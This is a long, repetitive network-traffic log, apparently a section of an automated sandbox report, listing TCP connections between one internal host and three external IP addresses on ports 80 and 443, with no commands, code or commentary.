                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49164
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                    Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49166
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49161
                    Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49168
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 85.239.241.184:80 -> 192.168.2.22:49167
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 95.217.202.210:80
                    Source: global traffic | TCP traffic: 95.217.202.210:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
